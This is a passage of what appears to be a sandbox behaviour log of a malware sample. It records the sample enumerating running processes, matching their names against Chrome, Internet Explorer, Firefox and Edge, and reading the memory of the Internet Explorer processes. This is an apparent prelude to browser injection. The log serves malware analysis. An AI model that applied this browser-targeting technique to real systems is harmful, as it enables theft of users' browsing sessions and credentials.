	[0218.986] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.986] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0218.987] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0218.987] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0218.988] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x4bb4
	[0218.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.988] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0218.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.988] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.989] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0218.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.989] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.990] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0218.991] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4bb8
	[0218.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.991] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0218.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.991] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.991] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0218.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.992] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.992] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0218.992] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x4bbc
	[0218.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.993] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0218.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.993] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.082] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0219.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.082] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.082] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0219.083] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x4bc0
	[0219.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.083] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0219.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.084] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.084] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0219.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.084] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.084] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0219.085] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x4bc4
	[0219.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.085] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0219.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.086] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.086] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0219.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.096] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.096] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0219.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x4bc8
	[0219.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.097] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0219.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.097] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.098] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0219.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.098] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.098] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0219.099] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x4bcc
	[0219.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.099] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0219.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.099] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.100] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0219.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.100] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.101] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0219.101] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x4bd0
	[0219.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.101] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0219.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.102] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.102] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0219.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.729] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.730] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0219.730] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x4bd4
	[0219.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.731] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0219.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.731] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.731] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0219.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.731] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.732] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0219.732] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x4bd8
	[0219.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.732] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0219.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.733] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.733] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0219.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.733] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.733] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0219.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x4bdc
	[0219.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.734] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0219.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.735] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.735] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0219.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.736] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.736] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0219.737] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x4be0
	[0219.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.737] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0219.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.737] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.738] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0219.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.738] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.739] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0219.740] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x4be4
	[0219.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.740] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0219.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.740] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.741] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0219.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.741] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.741] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0219.748] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x4be8
	[0219.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.748] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0219.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.749] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.750] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0219.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.751] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.751] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0219.752] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x4bec
	[0219.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.752] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0219.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.753] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.753] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0219.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.754] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.754] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0219.755] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x4bf0
	[0219.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.755] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0219.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.755] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0219.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.755] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0219.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.756] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.756] NtQueryInformationProcess (in: ProcessHandle=0x4bf0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0219.756] ReadProcessMemory (in: hProcess=0x4bf0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0219.756] ReadProcessMemory (in: hProcess=0x4bf0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0219.756] ReadProcessMemory (in: hProcess=0x4bf0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0219.756] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0219.756] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0219.757] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x4bf4
	[0219.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.757] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0219.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.758] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0219.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.758] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0219.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.759] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.759] NtQueryInformationProcess (in: ProcessHandle=0x4bf4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0219.759] ReadProcessMemory (in: hProcess=0x4bf4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0219.759] ReadProcessMemory (in: hProcess=0x4bf4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0219.759] ReadProcessMemory (in: hProcess=0x4bf4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0219.759] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0219.759] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0219.760] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x4bf8
	[0219.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.760] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0219.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.760] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.761] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0219.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.761] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.761] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0219.762] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x4bfc
	[0219.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.762] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0219.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.762] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.763] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0219.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.763] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.763] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.764] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x4c00
	[0219.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.764] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0219.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.764] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.765] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0219.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.765] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.765] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.766] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.767] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x4c04
	[0219.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.767] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0219.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.767] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.767] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0219.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.768] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.768] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0219.768] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x468) returned 0x4c08
	[0219.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.769] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0219.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.769] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.769] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0219.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.770] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
